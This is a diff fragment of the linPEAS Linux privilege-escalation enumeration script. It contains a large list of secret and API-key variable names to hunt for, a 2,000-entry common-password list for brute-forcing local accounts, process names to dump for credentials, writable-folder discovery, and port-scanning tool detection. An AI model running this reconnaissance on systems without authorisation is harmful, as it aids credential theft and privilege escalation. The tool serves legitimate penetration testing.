|OS_TENANT_NAME|PAGERDUTY_APIKEY|PAGERDUTY_ESCALATION_POLICY_ID|PAGERDUTY_FROM_USER|PAGERDUTY_PRIORITY_ID|PAGERDUTY_SERVICE_ID|PANTHEON_SITE|PARSE_APP_ID|PARSE_JS_KEY|PAYPAL_CLIENT_ID|PAYPAL_CLIENT_SECRET|PERCY_TOKEN|PERSONAL_KEY|PERSONAL_SECRET|PG_DATABASE|PG_HOST|PLACES_APIKEY|PLACES_API_KEY|PLACES_APPID|PLACES_APPLICATION_ID|PLOTLY_APIKEY|POSTGRESQL_DB|POSTGRESQL_PASS|POSTGRES_ENV_POSTGRES_DB|POSTGRES_ENV_POSTGRES_USER|POSTGRES_PORT|PREBUILD_AUTH|PROD.ACCESS.KEY.ID|PROD.SECRET.KEY|PROD_BASE_URL_RUNSCOPE|PROJECT_CONFIG|PUBLISH_KEY|PUBLISH_SECRET|PUSHOVER_TOKEN|PUSHOVER_USER|PYPI_PASSOWRD|QUIP_TOKEN|RABBITMQ_SERVER_ADDR|REDISCLOUD_URL|REDIS_STUNNEL_URLS|REFRESH_TOKEN|RELEASE_GH_TOKEN|RELEASE_TOKEN|remoteUserToShareTravis|REPORTING_WEBDAV_URL|REPORTING_WEBDAV_USER|repoToken|REST_API_KEY|RINKEBY_PRIVATE_KEY|ROPSTEN_PRIVATE_KEY|route53_access_key_id|RTD_KEY_PASS|RTD_STORE_PASS|RUBYGEMS_AUTH_TOKEN|s3_access_key|S3_ACCESS_KEY_ID|S3_BUCKET_NAME_APP_LOGS|S3_BUCKET_NAME_ASSETS|S3_KEY|S3_KEY_APP_LOGS|S3_KEY_ASSETS|S3_PHOTO_BUCKET|S3_SECRET_APP_LOGS|S3_SECRET_ASSETS|S3_SECRET_KEY|S3_USER_ID|S3_USER_SECRET|SACLOUD_ACCESS_TOKEN|SACLOUD_ACCESS_TOKEN_SECRET|SACLOUD_API|SALESFORCE_BULK_TEST_SECURITY_TOKEN|SANDBOX_ACCESS_TOKEN|SANDBOX_AWS_ACCESS_KEY_ID|SANDBOX_AWS_SECRET_ACCESS_KEY|SANDBOX_LOCATION_ID|SAUCE_ACCESS_KEY|SECRETACCESSKEY|SECRETKEY|SECRET_0|SECRET_10|SECRET_11|SECRET_1|SECRET_2|SECRET_3|SECRET_4|SECRET_5|SECRET_6|SECRET_7|SECRET_8|SECRET_9|SECRET_KEY_BASE|SEGMENT_API_KEY|SELION_SELENIUM_SAUCELAB_GRID_CONFIG_FILE|SELION_SELENIUM_USE_SAUCELAB_GRID|SENDGRID|SENDGRID_API_KEY|SENDGRID_FROM_ADDRESS|SENDGRID_KEY|SENDGRID_USER|SENDWITHUS_KEY|SENTRY_AUTH_TOKEN|SERVICE_ACCOUNT_SECRET|SES_ACCESS_KEY|SES_SECRET_KEY|setDstAccessKey|setDstSecretKey|setSecretKey|SIGNING_KEY|SIGNING_KEY_SECRET|SIGNING_KEY_SID|SNOOWRAP_CLIENT_SECRET|SNOOWRAP_REDIRECT_URI|SNOOWRAP_REFRESH_TOKEN|SNOOWRAP_USER_AGENT|SNYK_API_TOKEN|SNYK_ORG_ID|SNYK_TOKEN|SOCRATA_APP_TOKEN|SOCRATA_USER|SONAR_ORGANIZATION_KEY|SONAR_PROJECT_KEY|SONAR_TOKEN|SONATYPE_GPG_KEY_NAME|SONATYPE_GPG_PASSPHRASE|SONATYPE_PASSSONATYPE_TOKEN_USER|SONATYPE_USER|SOUNDCLOUD_CLIENT_ID|SOUNDCLOUD_CLIENT_SECRET|SPACES_ACCESS_KEY_ID|SPACES_SECRET_ACCESS_KEY|SPA_CLIENT_ID|SPOTIFY_API_ACCESS_TOKEN|SPOTIFY_API_CLIENT_ID|SPOTIFY_API_CLIENT_SECRET|sqsAccessKey|sqsSecretKey|SRCCLR_API_TOKEN|SSHPASS|SSMTP_CONFIG|STARSHIP_ACCOUNT_SID|STARSHIP_AUTH_TOKEN|STAR_TEST_AWS_ACCESS_KEY_ID|STAR_TEST_BUCKET|STAR_TEST_LOCATION|STAR_TEST_SECRET_ACCESS_KEY|STORMPATH_API_KEY_ID|STORMPATH_API_KEY_SECRET|STRIPE_PRIVATE|STRIPE_PUBLIC|STRIP_PUBLISHABLE_KEY|STRIP_SECRET_KEY|SURGE_LOGIN|SURGE_TOKEN|SVN_PASS|SVN_USER|TESCO_API_KEY|THERA_OSS_ACCESS_ID|THERA_OSS_ACCESS_KEY|TRAVIS_ACCESS_TOKEN|TRAVIS_API_TOKEN|TRAVIS_COM_TOKEN|TRAVIS_E2E_TOKEN|TRAVIS_GH_TOKEN|TRAVIS_PULL_REQUEST|TRAVIS_SECURE_ENV_VARS|TRAVIS_TOKEN|TREX_CLIENT_ORGURL|TREX_CLIENT_TOKEN|TREX_OKTA_CLIENT_ORGURL|TREX_OKTA_CLIENT_TOKEN|TWILIO_ACCOUNT_ID|TWILIO_ACCOUNT_SID|TWILIO_API_KEY|TWILIO_API_SECRET|TWILIO_CHAT_ACCOUNT_API_SERVICE|TWILIO_CONFIGURATION_SID|TWILIO_SID|TWILIO_TOKEN|TWITTEROAUTHACCESSSECRET|TWITTEROAUTHACCESSTOKEN|TWITTER_CONSUMER_KEY|TWITTER_CONSUMER_SECRET|UNITY_SERIAL|URBAN_KEY|URBAN_MASTER_SECRET|URBAN_SECRET|userTravis|USER_ASSETS_ACCESS_KEY_ID|USER_ASSETS_SECRET_ACCESS_KEY|VAULT_APPROLE_SECRET_ID|VAULT_PATH|VIP_GITHUB_BUILD_REPO_DEPLOY_KEY|VIP_GITHUB_DEPLOY_KEY|VIP_GITHUB_DEPLOY_KEY_PASS|VIRUSTOTAL_APIKEY|VISUAL_RECOGNITION_API_KEY|V_SFDC_CLIENT_ID|V_SFDC_CLIENT_SECRET|WAKATIME_API_KEY|WAKATIME_PROJECT|WATSON_CLIENT|WATSON_CONVERSATION_WORKSPACE|WATSON_DEVICE|WATSON_DEVICE_TOPIC|WATSON_TEAM_ID|WATSON_TOPIC|WIDGET_BASIC_USER_2|WIDGET_BASIC_USER_3|WIDGET_BASIC_USER_4|WIDGET_BASIC_USER_5|WIDGET_FB_USER|WIDGET_FB_USER_2|WIDGET_FB_USER_3|WIDGET_TEST_SERVERWORDPRESS_DB_USER|WORKSPACE_ID|WPJM_PHPUNIT_GOOGLE_GEOCODE_API_KEY|WPT_DB_HOST|WPT_DB_NAME|WPT_DB_USER|WPT_PREPARE_DIR|WPT_REPORT_API_KEY|WPT_SSH_CONNECT|WPT_SSH_PRIVATE_KEY_BASE64|YANGSHUN_GH_TOKEN|YT_ACCOUNT_CHANNEL_ID|YT_ACCOUNT_CLIENT_ID|YT_ACCOUNT_CLIENT_SECRET|YT_ACCOUNT_REFRESH_TOKEN|YT_API_KEY|YT_CLIENT_ID|YT_CLIENT_SECRET|YT_PARTNER_CHANNEL_ID|YT_PARTNER_CLIENT_ID|YT_PARTNER_CLIENT_SECRET|YT_PARTNER_ID|YT_PARTNER_REFRESH_TOKEN|YT_SERVER_API_KEY|ZHULIANG_GH_TOKEN|ZOPIM_ACCOUNT_KEY" - -top2000pwds="123456 password 123456789 12345678 12345 qwerty 123123 111111 abc123 1234567 dragon 1q2w3e4r sunshine 654321 master 1234 football 1234567890 000000 computer 666666 superman michael internet iloveyou daniel 1qaz2wsx monkey shadow jessica letmein baseball whatever princess abcd1234 123321 starwars 121212 thomas zxcvbnm trustno1 killer welcome jordan aaaaaa 123qwe freedom password1 charlie batman jennifer 7777777 michelle diamond oliver mercedes benjamin 11111111 snoopy samantha victoria matrix george alexander secret cookie asdfgh 987654321 123abc orange fuckyou asdf1234 pepper hunter silver joshua banana 1q2w3e chelsea 1234qwer summer qwertyuiop phoenix andrew q1w2e3r4 elephant rainbow mustang merlin london garfield robert chocolate 112233 samsung qazwsx matthew buster jonathan ginger flower 555555 test caroline amanda maverick midnight martin junior 88888888 anthony jasmine creative patrick mickey 123 qwerty123 cocacola chicken passw0rd forever william nicole hello yellow nirvana justin friends cheese tigger mother liverpool blink182 asdfghjkl andrea spider scooter richard soccer rachel purple morgan melissa jackson arsenal 222222 qwe123 gabriel ferrari jasper danielle bandit angela scorpion prince maggie austin veronica nicholas monster dexter carlos thunder success hannah ashley 131313 stella brandon pokemon joseph asdfasdf 999999 metallica december chester taylor sophie samuel rabbit crystal barney xxxxxx steven ranger patricia christian asshole spiderman sandra hockey angels security parker heather 888888 victor harley 333333 system slipknot november jordan23 canada tennis qwertyui casper gemini asd123 winter hammer cooper america albert 777777 winner charles butterfly swordfish popcorn penguin dolphin carolina access 987654 hardcore corvette apples 12341234 sabrina remember qwer1234 edward dennis cherry sparky natasha arthur vanessa marina leonardo johnny dallas antonio winston -snickers olivia nothing iceman destiny coffee apollo 696969 windows williams school madison dakota angelina anderson 159753 1111 yamaha trinity rebecca nathan guitar compaq 123123123 toyota shannon playboy peanut pakistan diablo abcdef maxwell golden asdasd 123654 murphy monica marlboro kimberly gateway bailey 00000000 snowball scooby nikita falcon august test123 sebastian panther love johnson godzilla genesis brandy adidas zxcvbn wizard porsche online hello123 fuckoff eagles champion bubbles boston smokey precious mercury lauren einstein cricket cameron angel admin napoleon mountain lovely friend flowers dolphins david chicago sierra knight yankees wilson warrior simple nelson muffin charlotte calvin spencer newyork florida fernando claudia basketball barcelona 87654321 willow stupid samson police paradise motorola manager jaguar jackie family doctor bullshit brooklyn tigers stephanie slayer peaches miller heaven elizabeth bulldog animal 789456 scorpio rosebud qwerty12 franklin claire american vincent testing pumpkin platinum louise kitten general united turtle marine icecream hacker darkness cristina colorado boomer alexandra steelers serenity please montana mitchell marcus lollipop jessie happy cowboy 102030 marshall jupiter jeremy gibson fucker barbara adrian 1qazxsw2 12344321 11111 startrek fishing digital christine business abcdefg nintendo genius 12qwaszx walker q1w2e3 player legend carmen booboo tomcat ronaldo people pamela marvin jackass google fender asdfghjk Password 1q2w3e4r5t zaq12wsx scotland phantom hercules fluffy explorer alexis walter trouble tester qwerty1 melanie manchester gordon firebird engineer azerty 147258 virginia tiger simpsons passion lakers james angelica 55555 vampire tiffany september private maximus loveme isabelle isabella eclipse dreamer changeme cassie badboy 123456a stanley sniper rocket passport pandora justice infinity cookies barbie xavier unicorn superstar -stephen rangers orlando money domino courtney viking tucker travis scarface pavilion nicolas natalie gandalf freddy donald captain abcdefgh a1b2c3d4 speedy peter nissan loveyou harrison friday francis dancer 159357 101010 spitfire saturn nemesis little dreams catherine brother birthday 1111111 wolverine victory student france fantasy enigma copper bonnie teresa mexico guinness georgia california sweety logitech julian hotdog emmanuel butter beatles 11223344 tristan sydney spirit october mozart lolita ireland goldfish eminem douglas cowboys control cheyenne alex testtest stargate raiders microsoft diesel debbie danger chance asdf anything aaaaaaaa welcome1 qwert hahaha forest eternity disney denise carter alaska zzzzzz titanic shorty shelby pookie pantera england chris zachary westside tamara password123 pass maryjane lincoln willie teacher pierre michael1 leslie lawrence kristina kawasaki drowssap college blahblah babygirl avatar alicia regina qqqqqq poohbear miranda madonna florence sapphire norman hamilton greenday galaxy frankie black awesome suzuki spring qazwsxedc magnum lovers liberty gregory 232323 twilight timothy swimming super stardust sophia sharon robbie predator penelope michigan margaret jesus hawaii green brittany brenda badger a1b2c3 444444 winnie wesley voodoo skippy shithead redskins qwertyu pussycat houston horses gunner fireball donkey cherokee australia arizona 1234abcd skyline power perfect lovelove kermit kenneth katrina eugene christ thailand support special runner lasvegas jason fuckme butthead blizzard athena abigail 8675309 violet tweety spanky shamrock red123 rascal melody joanna hello1 driver bluebird biteme atlantis arnold apple alison taurus random pirate monitor maria lizard kevin hummer holland buffalo 147258369 007007 valentine roberto potter magnolia juventus indigo indian harvey duncan diamonds daniela christopher bradley bananas warcraft sunset simone renegade -redsox philip monday mohammed indiana energy bond007 avalon terminator skipper shopping scotty savannah raymond morris mnbvcxz michele lucky lucifer kingdom karina giovanni cynthia a123456 147852 12121212 wildcats ronald portugal mike helpme froggy dragons cancer bullet beautiful alabama 212121 unknown sunflower sports siemens santiago kathleen hotmail hamster golfer future father enterprise clifford christina camille camaro beauty 55555555 vision tornado something rosemary qweasd patches magic helena denver cracker beaver basket atlanta vacation smiles ricardo pascal newton jeffrey jasmin january honey hollywood holiday gloria element chandler booger angelo allison action 99999999 target snowman miguel marley lorraine howard harmony children celtic beatrice airborne wicked voyager valentin thx1138 thumper samurai moonlight mmmmmm karate kamikaze jamaica emerald bubble brooke zombie strawberry spooky software simpson service sarah racing qazxsw philips oscar minnie lalala ironman goddess extreme empire elaine drummer classic carrie berlin asdfg 22222222 valerie tintin therock sunday skywalker salvador pegasus panthers packers network mission mark legolas lacrosse kitty kelly jester italia hiphop freeman charlie1 cardinal bluemoon bbbbbb bastard alyssa 0123456789 zeppelin tinker surfer smile rockstar operator naruto freddie dragonfly dickhead connor anaconda amsterdam alfred a12345 789456123 77777777 trooper skittles shalom raptor pioneer personal ncc1701 nascar music kristen kingkong global geronimo germany country christmas bernard benson wrestling warren techno sunrise stefan sister savage russell robinson oracle millie maddog lightning kingston kennedy hannibal garcia download dollar darkstar brutus bobby autumn webster vanilla undertaker tinkerbell sweetpea ssssss softball rafael panasonic pa55word keyboard isabel hector fisher dominic darkside cleopatra blue assassin amelia vladimir roland -nigger national monique molly matthew1 godfather frank curtis change central cartman brothers boogie archie warriors universe turkey topgun solomon sherry sakura rush2112 qwaszx office mushroom monika marion lorenzo john herman connect chopper burton blondie bitch bigdaddy amber 456789 1a2b3c4d ultimate tequila tanner sweetie scott rocky popeye peterpan packard loverboy leonard jimmy harry griffin design buddha 1 wallace truelove trombone toronto tarzan shirley sammy pebbles natalia marcel malcolm madeline jerome gilbert gangster dingdong catalina buddy blazer billy bianca alejandro 54321 252525 111222 0000 water sucker rooster potato norton lucky1 loving lol123 ladybug kittycat fuck forget flipper fireman digger bonjour baxter audrey aquarius 1111111111 pppppp planet pencil patriots oxford million martha lindsay laura jamesbond ihateyou goober giants garden diana cecilia brazil blessing bishop bigdog airplane Password1 tomtom stingray psycho pickle outlaw number1 mylove maurice madman maddie lester hendrix hellfire happy1 guardian flamingo enter chichi 0987654321 western twister trumpet trixie socrates singer sergio sandman richmond piglet pass123 osiris monkey1 martina justine english electric church castle caesar birdie aurora artist amadeus alberto 246810 whitney thankyou sterling star ronnie pussy printer picasso munchkin morpheus madmax kaiser julius imperial happiness goodluck counter columbia campbell blessed blackjack alpha 999999999 142536 wombat wildcat trevor telephone smiley saints pretty oblivion newcastle mariana janice israel imagine freedom1 detroit deedee darren catfish adriana washington warlock valentina valencia thebest spectrum skater sheila shaggy poiuyt member jessica1 jeremiah jack insane iloveu handsome goldberg gabriela elijah damien daisy buttons blabla bigboy apache anthony1 a1234567 xxxxxxxx toshiba tommy sailor peekaboo motherfucker montreal manuel madrid kramer -katherine kangaroo jenny immortal harris hamlet gracie fucking firefly chocolat bentley account 321321 2222 1a2b3c thompson theman strike stacey science running research polaris oklahoma mariposa marie leader julia island idontknow hitman german felipe fatcat fatboy defender applepie annette 010203 watson travel sublime stewart steve squirrel simon sexy pineapple phoebe paris panzer nadine master1 mario kelsey joker hongkong gorilla dinosaur connie bowling bambam babydoll aragorn andreas 456123 151515 wolves wolfgang turner semperfi reaper patience marilyn fletcher drpepper dorothy creation brian bluesky andre yankee wordpass sweet spunky sidney serena preston pauline passwort original nightmare miriam martinez labrador kristin kissme henry gerald garrett flash excalibur discovery dddddd danny collins casino broncos brendan brasil apple123 yvonne wonder window tomato sundance sasha reggie redwings poison mypassword monopoly mariah margarita lionking king football1 director darling bubba biscuit 44444444 wisdom vivian virgin sylvester street stones sprite spike single sherlock sandy rocker robin matt marianne linda lancelot jeanette hobbes fred ferret dodger cotton corona clayton celine cannabis bella andromeda 7654321 4444 werewolf starcraft sampson redrum pyramid prodigy paul michel martini marathon longhorn leopard judith joanne jesus1 inferno holly harold happy123 esther dudley dragon1 darwin clinton celeste catdog brucelee argentina alpine 147852369 wrangler william1 vikings trigger stranger silvia shotgun scarlett scarlet redhead raider qweasdzxc playstation mystery morrison honda february fantasia designer coyote cool bulldogs bernie baby asdfghj angel1 always adam 202020 wanker sullivan stealth skeeter saturday rodney prelude pingpong phillip peewee peanuts peace nugget newport myself mouse memphis lover lancer kristine james1 hobbit halloween fuckyou1 finger fearless dodgers delete cougar -charmed cassandra caitlin bismillah believe alice airforce 7777 viper tony theodore sylvia suzanne starfish sparkle server samsam qweqwe public pass1234 neptune marian krishna kkkkkk jungle cinnamon bitches 741852 trojan theresa sweetheart speaker salmon powers pizza overlord michaela meredith masters lindsey history farmer express escape cuddles carson candy buttercup brownie broken abc12345 aardvark Passw0rd 141414 124578 123789 12345678910 00000 universal trinidad tobias thursday surfing stuart stinky standard roller porter pearljam mobile mirage markus loulou jjjjjj herbert grace goldie frosty fighter fatima evelyn eagle desire crimson coconut cheryl beavis anonymous andres africa 134679 whiskey velvet stormy springer soldier ragnarok portland oranges nobody nathalie malibu looking lemonade lavender hitler hearts gotohell gladiator gggggg freckles fashion david1 crusader cosmos commando clover clarence center cadillac brooks bronco bonita babylon archer alexandre 123654789 verbatim umbrella thanks sunny stalker splinter sparrow selena russia roberts register qwert123 penguins panda ncc1701d miracle melvin lonely lexmark kitkat julie graham frances estrella downtown doodle deborah cooler colombia chemistry cactus bridge bollocks beetle anastasia 741852963 69696969 unique sweets station showtime sheena santos rock revolution reading qwerasdf password2 mongoose marlene maiden machine juliet illusion hayden fabian derrick crazy cooldude chipper bomber blonde bigred amazing aliens abracadabra 123qweasd wwwwww treasure timber smith shelly sesame pirates pinkfloyd passwords nature marlin marines linkinpark larissa laptop hotrod gambit elvis education dustin devils damian christy braves baller anarchy white valeria underground strong poopoo monalisa memory lizzie keeper justdoit house homer gerard ericsson emily divine colleen chelsea1 cccccc camera bonbon billie bigfoot badass asterix anna animals -andy achilles a1s2d3f4 violin veronika vegeta tyler test1234 teddybear tatiana sporting spartan shelley sharks respect raven pentium papillon nevermind marketing manson madness juliette jericho gabrielle fuckyou2 forgot firewall faith evolution eric eduardo dagger cristian cavalier canadian bruno blowjob blackie beagle admin123 010101 together spongebob snakes sherman reddog reality ramona puppies pedro pacific pa55w0rd omega noodle murray mollie mister halflife franco foster formula1 felix dragonball desiree default chris1 bunny bobcat asdf123 951753 5555 242424 thirteen tattoo stonecold stinger shiloh seattle santana roger roberta rastaman pickles orion mustang1 felicia dracula doggie cucumber cassidy britney brianna blaster belinda apple1 753951 teddy striker stevie soleil snake skateboard sheridan sexsex roxanne redman qqqqqqqq punisher panama paladin none lovelife lights jerry iverson inside hornet holden groovy gretchen grandma gangsta faster eddie chevelle chester1 carrot cannon button administrator a 1212 zxc123 wireless volleyball vietnam twinkle terror sandiego rose pokemon1 picture parrot movies moose mirror milton mayday maestro lollypop katana johanna hunting hudson grizzly gorgeous garbage fish ernest dolores conrad chickens charity casey blueberry blackman blackbird bill beckham battle atlantic wildfire weasel waterloo trance storm singapore shooter rocknroll richie poop pitbull mississippi kisses karen juliana james123 iguana homework highland fire elliot eldorado ducati discover computer1 buddy1 antonia alphabet 159951 123456789a 1123581321 0123456 zaq1xsw2 webmaster vagina unreal university tropical swimmer sugar southpark silence sammie ravens question presario poiuytrewq palmer notebook newman nebraska manutd lucas hermes gators dave dalton cheetah cedric camilla bullseye bridget bingo ashton 123asd yahoo volume valhalla tomorrow starlight scruffy roscoe richard1 positive -plymouth pepsi patrick1 paradox milano maxima loser lestat gizmo ghetto faithful emerson elliott dominique doberman dillon criminal crackers converse chrissy casanova blowme attitude" -PASSTRY="2000" #Default num of passwds to try (all by default) - -if [ "$PORTS" ] || [ "$DISCOVERY" ] || [ "$IP" ]; then MAXPATH_FIND_W="1"; fi #If Network reduce the time on this -SEDOVERFLOW=true -for grp in `groups $USER | cut -d ":" -f2`; do - wgroups="$wgroups -group $grp -or " -done -wgroups="`echo $wgroups | rev | cut -c5- | rev`" -while $SEDOVERFLOW; do - #WF=`find /dev /srv /proc /home /media /sys /lost+found /run /etc /root /var /tmp /mnt /boot /opt -type d -maxdepth $MAXPATH_FIND_W -writable -or -user $USER 2>/dev/null | sort` - #if [ "$MACPEAS" ]; then - WF=`find / -maxdepth $MAXPATH_FIND_W -type d ! -path "/proc/*" '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null | sort` #OpenBSD find command doesn't have "-writable" option - #else - # WF=`find / -maxdepth $MAXPATH_FIND_W -type d ! -path "/proc/*" -and '(' -writable -or -user $USER ')' 2>/dev/null | sort` - #fi - Wfolders=`printf "$WF" | tr '\n' '|'`"|[^\*]\ \*" - Wfolder="`printf "$WF" | grep "tmp\|shm\|home\|Users\|root\|etc\|var\|opt\|bin\|lib\|mnt\|private\|Applications" | head -n1`" - printf "test\ntest\ntest\ntest"| sed -E "s,$Wfolders|\./|\.:|:\.,${C}[1;31;103m&${C}[0m,g" >/dev/null 2>&1 - if [ $? -eq 0 ]; then - SEDOVERFLOW=false - else - MAXPATH_FIND_W=$(($MAXPATH_FIND_W-1)) #If overflow of directories, check again with MAXPATH_FIND_W - 1 - fi -done - -notExtensions="\.tif$|\.tiff$|\.gif$|\.jpeg$|\.jpg|\.jif$|\.jfif$|\.jp2$|\.jpx$|\.j2k$|\.j2c$|\.fpx$|\.pcd$|\.png$|\.pdf$|\.flv$|\.mp4$|\.mp3$|\.gifv$|\.avi$|\.mov$|\.mpeg$|\.wav$|\.doc$|\.docx$|\.xls$|\.xlsx$" - -TIMEOUT=`which timeout 2>/dev/null` -GCC=`which gcc 2>/dev/null` - -pathshG="/0trace.sh|/alsa-info.sh|amuFormat.sh|/blueranger.sh|/dnsmap-bulk.sh|/gettext.sh|/go-rhn.sh|/gvmap.sh|/lesspipe.sh|/mksmbpasswd.sh|/power_report.sh|/setuporamysql.sh|/setup-nsssysinit.sh|/readlink_f.sh|/testacg.sh|/testlahf.sh|/url_handler.sh" - -notBackup="/tdbbackup$|/db_hotbackup$" - -cronjobsG=".placeholder|0anacron|0hourly|anacron|apache2|apport|apt|aptitude|apt-compat|bsdmainutils|certwatch|cracklib-runtime|debtags|dpkg|e2scrub_all|fake-hwclock|fstrim|john|locate|logrotate|man-db.cron|man-db|mdadm|mlocate|ntp|passwd|php|popularity-contest|raid-check|rwhod|samba|standard|sysstat|ubuntu-advantage-tools|update-notifier-common|upstart" -cronjobsB="centreon" - -processesVB="jdwp|tmux |screen |--inspect|--remote-debugging-port" -processesB="knockd" -processesDump="gdm-password|gnome-keyring-daemon|lightdm|vsftpd|apache2|sshd:" - -mail_apps="Postfix|Dovecot|Exim|SquirrelMail|Cyrus|Sendmail|Courier" - -profiledG="01-locale-fix.sh|256term.csh|256term.sh|abrt-console-notification.sh|appmenu-qt5.sh|apps-bin-path.sh|bash_completion.sh|cedilla-portuguese.sh|colorgrep.csh|colorgrep.sh|colorls.csh|colorls.sh|colorxzgrep.csh|colorxzgrep.sh|colorzgrep.csh|colorzgrep.sh|csh.local|gawk.csh|gawk.sh|kali.sh|lang.csh|lang.sh|less.csh|less.sh|sh.local|vim.csh|vim.sh|vte.csh|vte-2.91.sh|which2.csh|which2.sh|Z97-byobu.sh|Z99-cloudinit-warnings.sh|Z99-cloud-locale-test.sh" - -knw_emails=".*@aivazian.fsnet.co.uk|.*@angband.pl|.*@canonical.com|.*centos.org|.*debian.net|.*debian.org|.*@jff.email|.*kali.org|.*linux.it|.*@linuxia.de|.*@lists.debian-maintainers.org|.*@mit.edu|.*@oss.sgi.com|.*@qualcomm.com|.*redhat.com|.*ubuntu.com|.*@vger.kernel.org|rogershimizu@gmail.com|thmarques@gmail.com" - -timersG="apt-daily.timer|apt-daily-upgrade.timer|e2scrub_all.timer|fstrim.timer|logrotate.timer|man-db.timer|motd-news.timer|phpsessionclean.timer|snapd.refresh.timer|snapd.snap-repair.timer|systemd-tmpfiles-clean.timer|systemd-readahead-done.timer|ureadahead-stop.timer" - -commonrootdirsG="^/$|/bin$|/boot$|/.cache$|/cdrom|/dev$|/etc$|/home$|/lost+found$|/lib$|/lib64$|/media$|/mnt$|/opt$|/proc$|/root$|/run$|/sbin$|/snap$|/srv$|/sys$|/tmp$|/usr$|/var$" -commonrootdirsMacG="^/$|/.DocumentRevisions-V100|/.fseventsd|/.PKInstallSandboxManager-SystemSoftware|/.Spotlight-V100|/.Trashes|/.vol|/Applications|/bin|/cores|/dev|/home|/Library|/macOS Install Data|/net|/Network|/opt|/private|/sbin|/System|/Users|/usr|/Volumes" - -ldsoconfdG="/lib32|/lib/x86_64-linux-gnu|/usr/lib32|/usr/lib/oracle/19.6/client64/lib/|/usr/lib/x86_64-linux-gnu/libfakeroot|/usr/lib/x86_64-linux-gnu|/usr/local/lib/x86_64-linux-gnu|/usr/local/lib" - -dbuslistG="^:1\.[0-9\.]+|com.hp.hplip|com.redhat.NewPrinterNotification|com.redhat.PrinterDriversInstaller|com.ubuntu.LanguageSelector|com.ubuntu.SoftwareProperties|com.ubuntu.SystemService|com.ubuntu.USBCreator|com.ubuntu.WhoopsiePreferences|io.snapcraft.SnapdLoginService|fi.epitest.hostap.WPASupplicant|fi.w1.wpa_supplicant1|NAME|org.blueman.Mechanism|org.bluez|org.debian.apt|org.freedesktop.Accounts|org.freedesktop.Avahi|org.freedesktop.ColorManager|org.freedesktop.DBus|org.freedesktop.DisplayManager|org.freedesktop.fwupd|org.freedesktop.GeoClue2|org.freedesktop.hostname1|org.freedesktop.locale1|org.freedesktop.login1|org.freedesktop.ModemManager1|org.freedesktop.NetworkManager|org.freedesktop.network1|org.freedesktop.nm_dispatcher|org.freedesktop.PackageKit|org.freedesktop.PolicyKit1|org.freedesktop.RealtimeKit1|org.freedesktop.resolve1|org.freedesktop.systemd1|org.freedesktop.thermald|org.freedesktop.timedate1|org.freedesktop.timesync1|org.freedesktop.UDisks2|org.freedesktop.UPower|org.opensuse.CupsPkHelper.Mechanism" - -########################################### -#---------) Checks before start (---------# -########################################### -# --) ps working good -# --) Network binaries - -if [ `ps aux 2>/dev/null | wc -l 2>/dev/null` -lt 8 ]; then - NOUSEPS="1" -fi - -DISCOVER_BAN_BAD="No network discovery capabilities (fping or ping not found)" -FPING=$(which fping) -PING=$(which ping) -if [ "$FPING" ]; then - DISCOVER_BAN_GOOD="$GREEN$FPING$B is available for network discovery$LG ($SCRIPTNAME can discover hosts, learn more with -h)" -else - if [ "$PING" ]; then - DISCOVER_BAN_GOOD="$GREEN$PING$B is available for network discovery$LG ($SCRIPTNAME can discover hosts, learn more with -h)" - fi -fi - -SCAN_BAN_BAD="No port scan capabilities (nc not found)" -FOUND_NC=$(which nc 2>/dev/null) -if [ -z "$FOUND_NC" ]; then - FOUND_NC=$(which netcat 2>/dev/null); -fi -if [ -z "$FOUND_NC" ]; then - FOUND_NC=$(which ncat 2>/dev/null); -fi -if [ -z "$FOUND_NC" ]; then - FOUND_NC=$(which nc.traditional 2>/dev/null); -fi -if [ -z "$FOUND_NC" ]; then - FOUND_NC=$(which nc.openbsd 2>/dev/null); -fi -if [ "$FOUND_NC" ]; then - SCAN_BAN_GOOD="$GREEN$FOUND_NC$B is available for network discover & port scanning$LG ($SCRIPTNAME can discover hosts and scan ports, learn more with -h)" -fi ########################################### -#-----------) Main Functions (------------# +#---------------) BANNER (----------------# ########################################### -echo_not_found (){ - printf $DG"$1 Not Found\n"$NC -} - -echo_no (){ - printf $DG"No\n"$NC -} - -print_ps (){ - (ls -d /proc/*/ 2>/dev/null | while read f; do - CMDLINE=`cat $f/cmdline 2>/dev/null | grep -av "seds,"`; #Delete my own sed processess - if [ "$CMDLINE" ]; - then USER2=ls -ld $f | awk '{print $3}'; PID=`echo $f | cut -d "/" -f3`; - printf " %-13s %-8s %s\n" "$USER2" "$PID" "$CMDLINE"; - fi; - done) 2>/dev/null | sort -r -} - print_banner(){ if [ "$MACPEAS" ]; then bash -c "printf ' @@ -433,12 +172,346 @@ print_banner(){ fi } + +########################################### +#-----------) Starting Output (-----------# +########################################### + +echo "" +if [ !"$QUIET" ]; then print_banner; fi +printf $B" $SCRIPTNAME $VERSION ${Y}by carlospolop\n"$NC; +echo "" +printf $Y"ADVISORY: "$B"$ADVISORY\n"$NC +echo "" +printf $B"Linux Privesc Checklist: "$Y"https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist\n"$NC +echo " LEGEND:" | sed "s,LEGEND,${C}[1;4m&${C}[0m," +echo " RED/YELLOW: 95% a PE vector" | sed "s,RED/YELLOW,${C}[1;31;103m&${C}[0m," +echo " RED: You must take a look at it" | sed "s,RED,${C}[1;31m&${C}[0m," +echo " LightCyan: Users with console" | sed "s,LightCyan,${C}[1;96m&${C}[0m," +echo " Blue: Users without console & mounted devs" | sed "s,Blue,${C}[1;34m&${C}[0m," +echo " Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) " | sed "s,Green,${C}[1;32m&${C}[0m," +echo " LightMangeta: Your username" | sed "s,LightMagenta,${C}[1;95m&${C}[0m," +if [ "$IAMROOT" ]; then + echo "" + echo " YOU ARE ALREADY ROOT!!! (it could take longer to complete execution)" | sed "s,YOU ARE ALREADY ROOT!!!,${C}[1;31;103m&${C}[0m," + sleep 3 +fi +echo "" +printf " ${DG}Starting $SCRIPTNAME. Caching Writable Folders...$NC" +echo "" + +########################################### +#---------------) Lists (-----------------# +########################################### + +filename="$SCRIPTNAME.txt$RANDOM" +kernelB=" 4.0.[0-9]+| 4.1.[0-9]+| 4.2.[0-9]+| 4.3.[0-9]+| 4.4.[0-9]+| 4.5.[0-9]+| 4.6.[0-9]+| 4.7.[0-9]+| 4.8.[0-9]+| 4.9.[0-9]+| 4.10.[0-9]+| 4.11.[0-9]+| 4.12.[0-9]+| 4.13.[0-9]+| 3.9.6| 